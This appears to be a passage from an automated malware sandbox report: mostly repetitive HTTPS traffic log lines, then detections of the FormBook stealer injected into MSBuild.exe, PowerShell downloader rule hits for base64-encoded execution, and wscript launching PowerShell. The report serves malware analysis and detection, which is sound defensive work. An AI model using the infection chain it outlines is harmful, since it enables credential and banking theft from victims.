                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49695 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                  Source: unknownHTTPS traffic detected: 104.22.69.199:443 -> 192.168.2.8:49693 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.8:49694 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.22.69.199:443 -> 192.168.2.8:49695 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.8:49696 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.8:49708 version: TLS 1.2

                  E-Banking Fraud

                  barindex
                  Yara detected FormBook
                  Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000C.00000002.2229860985.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2229410762.0000000004B40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.2226580404.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1277774749.0000000002860000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.2229866615.0000000002E70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1258834116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1262010486.0000000001930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.2232234775.00000000056B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 8.2.powershell.exe.15d903ef8d0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables (downloaders) containing reversed URLs to raw contents of a paste Author: ditekSHen
                  Source: 8.2.powershell.exe.15d903ef8d0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects known downloader agent Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 7780, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 7916, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 8040, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Wscript starts Powershell (via cmd or directly)
